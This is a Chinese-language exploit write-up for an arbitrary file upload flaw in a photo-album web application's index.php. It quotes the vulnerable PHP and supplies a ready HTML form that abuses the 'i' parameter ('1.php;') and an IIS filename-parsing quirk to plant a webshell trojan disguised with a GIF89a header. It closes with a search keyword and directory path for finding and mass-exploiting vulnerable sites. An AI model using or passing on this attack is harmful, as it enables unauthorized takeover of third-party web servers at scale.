漏洞出现在“index.php”,看代码:

if($do == 'upload'){   
     if($_POST['formsub']){
         $file = $_FILES['upload'];
         if(!$file['error']){
             if(strpos($file['type'], 'image') === 0){
                 $hash = $_POST['i'].'.jpg'; //若是IIS,则可此处可自行构造IIS畸形文件扩展名得到一个webshell
                 if(move_uploaded_file($file['tmp_name'], "./attach/$hash")){
                     thumb("./attach/$hash");
                     js_reload();
                 } else{
                     js_alert('保存失败!');   
                 }
             } else{
                 js_alert('不支持的格式!');
             }   
         } else{
             js_alert('上传出错啦!');
         }
     }
}

本地构造表单:

<form action="http://XXX.com/user/index.php?do=upload" method="post" enctype="multipart/form-data" name="form_post" id="form_post" target="ajax">
<input type="file" name="upload">
<input type="hidden" name="i" value="1.php;">  这里可以改为1.asp;或者别的类型的文件
<input type="hidden" name="formsub" value="true">
<input name="submit" type="submit"  value="上传">
<iframe name="ajax" id="ajax" style="display:none"></iframe>
</form>

    提交一个包含"gif89a"文件头的木马(大马),会在“/attach”目录下生成一个“1.php;.jpg”的webshell。如果IE显示红X,请换火狐。

    批量利用:搜索关键词“专注于收集、发布网友喜欢的图片”。这套相册大部分集成于dedecms的图片类网站,目录为:“http://www.xxx.com/user”。